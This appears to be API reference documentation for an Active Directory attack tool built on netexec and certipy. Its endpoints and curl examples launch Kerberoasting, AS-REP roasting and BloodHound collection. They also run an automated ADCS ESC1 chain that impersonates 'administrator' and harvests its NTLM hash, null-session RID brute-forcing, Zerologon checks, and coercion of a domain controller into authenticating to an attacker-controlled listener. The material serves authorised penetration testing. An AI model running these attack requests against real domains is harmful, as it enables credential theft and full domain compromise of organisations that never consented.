Skip to main content
All authenticated endpoints support two authentication modes:
  • NTLM / Kerberos password auth: provide username, password, domain. Set use_kerberos: true to add the -k flag to netexec commands (requires time sync via sudo_password).
  • Kerberos ccache auth: set use_kcache: true and provide the ccache_file filename (basename only). The ccache file must exist in recon/ccache/. The username and domain are extracted from the ccache automatically.
DC host and DC IP are always read from the stored network info — they do not need to be passed in every request.

POST /api/bloodhound/run

Collects BloodHound data via netexec ldap ... --bloodhound --collection All. The resulting .zip file is automatically moved from ~/.nxc/logs/ to recon/ after completion. 
curl -X POST http://localhost:8000/api/bloodhound/run \
  -H "Content-Type: application/json" \
  -d '{
    "username": "administrator",
    "password": "Password1!",
    "domain": "corp.local"
  }'

Request Body

username
string
Domain account username. Required for NTLM/Kerberos password auth.
password
string
Account password. Required for NTLM/Kerberos password auth.
domain
string
Active Directory domain. Falls back to stored network info if omitted.
use_kerberos
boolean
Add -k flag to use Kerberos with password credentials. Requires sudo_password for time sync.
use_kcache
boolean
Authenticate using a Kerberos ccache file. Requires ccache_file and sudo_password.
ccache_file
string
Basename of the ccache file in recon/ccache/ (e.g. administrator.ccache).
sudo_password
string
Required when use_kerberos or use_kcache is true (for ntpdate time sync).

Response

status
string
"success" on completion.
scan_id
string
UUID of the scan record.
message
string
Completion summary including DC hostname.
command
string
NetExec command executed (password redacted).

POST /api/kerberoast/run

Enumerates and extracts Kerberos TGS hashes for service accounts via netexec ldap ... --kerberoasting. Hashes are automatically parsed and stored in the credentials database with source = "kerberoast". 
curl -X POST http://localhost:8000/api/kerberoast/run \
  -H "Content-Type: application/json" \
  -d '{
    "username": "lowpriv",
    "password": "Pass123!"
  }'

Request Body

username
string
Domain account username.
password
string
Account password.
domain
string
Domain name. Falls back to stored network info.
use_kerberos
boolean
Use Kerberos protocol with password credentials.
use_kcache
boolean
Use ccache file for authentication.
ccache_file
string
ccache filename in recon/ccache/.
sudo_password
string
Required when time sync is needed.

Response

status
string
"success" on completion.
scan_id
string
Scan UUID.
message
string
Includes count of hashes imported to credentials database.

POST /api/asreproast/run

Enumerates accounts with Kerberos pre-authentication disabled and captures their AS-REP hashes via netexec ldap ... --asreproast. Hashes are automatically stored with source = "asreproast".

Request Body

Same parameters as /api/kerberoast/run: username, password, domain, use_kerberos, use_kcache, ccache_file, sudo_password.

Response

status
string
"success" on completion.
scan_id
string
Scan UUID.
message
string
Includes count of hashes found and imported.
output
string
Raw netexec output.

POST /api/adcs/run

Enumerates Active Directory Certificate Services vulnerabilities using certipy-ad find. Parses the JSON output and stores discovered ESC vulnerabilities in the adcs_vulns database table. 
curl -X POST http://localhost:8000/api/adcs/run \
  -H "Content-Type: application/json" \
  -d '{
    "username": "lowpriv",
    "password": "Pass123!",
    "domain": "corp.local"
  }'

Request Body

username
string
Domain account username.
password
string
Account password.
domain
string
Domain. Falls back to stored network info.
target
string
DC IP to target. Falls back to stored DC IP.
vulnerable_only
boolean
Pass -vulnerable to certipy-ad to only return vulnerable templates. Defaults to true.
use_kerberos
boolean
Use Kerberos protocol.
use_kcache
boolean
Use ccache file.
ccache_file
string
ccache filename.
sudo_password
string
Required for time sync with Kerberos.

Response

status
string
"success" on completion.
scan_id
string
Scan UUID.
message
string
Summary including target and whether ADCS was found.

GET /api/adcs/vulns

Returns all ADCS vulnerability records stored in the database from the last certipy scan. 
curl http://localhost:8000/api/adcs/vulns

Response

vulns
array
Array of ADCS vulnerability objects.

POST /api/adcs/esc1/run

Executes the full automated Certipy ESC1 privilege escalation chain in three steps:
  1. Sid — Query objectSid of the target account using certipy-ad account ... read.
  2. Req — Request a certificate from the vulnerable template using certipy-ad req.
  3. Auth — Authenticate with the certificate to obtain an NTLM hash using certipy-ad auth.
The resulting NTLM hash is automatically saved to the credentials database with source = "certipy-ESC1". 
curl -X POST http://localhost:8000/api/adcs/esc1/run \
  -H "Content-Type: application/json" \
  -d '{
    "username": "lowpriv",
    "password": "Pass123!",
    "domain": "corp.local",
    "dc_ip": "10.10.10.1",
    "ca_host": "ca01.corp.local",
    "ca_name": "corp-CA01-CA",
    "template": "VulnerableTemplate",
    "upn": "administrator"
  }'

Request Body

username
string
required
Domain account username to authenticate as.
password
string
required
Account password.
domain
string
required
Active Directory domain.
dc_ip
string
required
Domain controller IP.
ca_host
string
required
Hostname of the Certificate Authority server.
ca_name
string
required
CA name as it appears in certipy output (e.g. corp-DC01-CA).
template
string
required
Name of the vulnerable certificate template to abuse.
upn
string
required
User Principal Name to impersonate in the certificate (typically administrator).

Response

status
string
"success" when the attack chain was launched.
scan_id
string
UUID for polling with /api/adcs/esc1/status?scan_id=<id>.

GET /api/adcs/esc1/status

Returns the current state of a running or completed ESC1 attack chain. 
curl "http://localhost:8000/api/adcs/esc1/status?scan_id=<uuid>"

Query Parameter

scan_id
string
required
UUID returned by /api/adcs/esc1/run.

Response

status
string
running, completed, error, or not_found.
phase
string
Current attack phase: sid, req, or auth.
output
string
Accumulated log output from all three certipy steps.
ntlm_hash
string
The captured NTLM hash (populated on completion), or null.
error
string
Error message if status is error, otherwise null.

POST /api/domain-info/run

Collects domain controller information by running four netexec LDAP queries in parallel:
  • --dc-list (DC enumeration)
  • --pass-pol (password policy)
  • -M maq (Machine Account Quota)
  • --get-sid (domain SID)
This is a background operation; the endpoint returns immediately with a scan_id.

Request Body

Same parameters as BloodHound: username, password, domain, target, use_kerberos, use_kcache, ccache_file, sudo_password.

Response

status
string
"success" when background tasks were launched.
scan_id
string
Scan UUID for polling.
message
string
"Domain info scan started in background".

POST /api/domain-info/delegation/run

Enumerates Kerberos delegation (unconstrained, constrained, and resource-based) via netexec ldap ... --find-delegation. Results are stored in the delegation table.

Request Body

Same auth parameters as BloodHound: username, password, domain, use_kerberos, use_kcache, ccache_file, sudo_password.

Response

status
string
"success" on completion.
message
string
Count of delegation entries found.
data
array
Array of delegation objects returned directly in the response.

GET /api/domain-info/delegation/data

Returns all delegation records stored in the database from the last delegation scan. 
curl http://localhost:8000/api/domain-info/delegation/data

Response

status
string
"success" on success.
delegations
array
Array of delegation objects (same schema as above), ordered by account name.

GET /api/domain-info

Returns all domain controller records stored in the database. 
curl http://localhost:8000/api/domain-info

Response

status
string
"success" on success.
data
array
Array of DC info objects.

GET /api/password-policy

Returns the domain password policy stored from the last domain info scan. 
curl http://localhost:8000/api/password-policy

Response

status
string
"success" on success.
policy
object
Password policy fields.

POST /api/users/rid-brute

Enumerates domain user and group accounts by cycling RIDs over SMB (netexec smb ... --rid-brute). No domain credentials are required — a valid SMB session (even null/guest) is sufficient. Results are stored in the users and groups tables. 
curl -X POST http://localhost:8000/api/users/rid-brute \
  -H "Content-Type: application/json" \
  -d '{
    "target": "10.10.10.1",
    "username": "",
    "password": ""
  }'

Request Body

target
string
required
IP or hostname of the target DC or domain-joined host.
username
string
required
SMB username (use empty string or "guest" for unauthenticated).
password
string
required
SMB password (empty string for null session).

Response

status
string
"success" when the background task was launched.
scan_id
string
Scan UUID.
output_file
string
Path to the raw netexec output file.

POST /api/users/export

Enumerates domain user accounts with full attributes (last password set, bad password count, description) via netexec smb ... --users. Results are stored in the users table.

Request Body

target
string
required
Target DC IP or hostname.
username
string
required
Authenticated domain account username.
password
string
required
Account password.

Response

status
string
"success" on completion.
message
string
"User enumeration completed".
scan_id
string
Scan UUID.

POST /api/zerologon/run

Tests for the Zerologon vulnerability (CVE-2020-1472) via netexec smb <target> -M zerologon. No credentials required. If target is not provided, the stored DC IP is used. 
curl -X POST http://localhost:8000/api/zerologon/run \
  -H "Content-Type: application/json" \
  -d '{"target": "10.10.10.1"}'

Request Body

target
string
DC IP to test. Falls back to stored DC IP if omitted.

Response

status
string
"success" on completion.
message
string
Completion message.
output
string
Full netexec output including vulnerability verdict.
scan_id
string
Scan UUID.

POST /api/coerce/run

Runs the coerce_plus NetExec module to force NTLM authentication from a target host to your listener. Supports all coercion methods (PetitPotam, PrintSpooler, DFSCoerce, etc.) and can set ALWAYS=true to attempt all methods even after a successful response. 
curl -X POST http://localhost:8000/api/coerce/run \
  -H "Content-Type: application/json" \
  -d '{
    "target": "10.10.10.1",
    "listener": "10.10.14.5",
    "username": "lowpriv",
    "password": "Pass123!",
    "domain": "corp.local",
    "always": true
  }'

Request Body

target
string
required
IP or hostname of the machine to coerce (typically the DC).
listener
string
IP address of your listener (Responder/ntlmrelayx). Maps to LISTENER= module option.
username
string
Domain account username for the SMB session. Use empty string for unauthenticated attempts.
password
string
Account password.
domain
string
Domain name. Falls back to stored network info.
always
boolean
Set ALWAYS=true to continue attempting all coercion methods even after one succeeds. Defaults to false.
method
string
Restrict to a specific coercion method (e.g. "PetitPotam", "PrintSpooler"). When omitted, all methods are attempted.

Response

status
string
"success" on completion.
message
string
Completion summary.
output
string
Full netexec output.
scan_id
string
Scan UUID.
command
string
NetExec command executed.

Build docs developers (and LLMs) love

Get started for freeTalk to us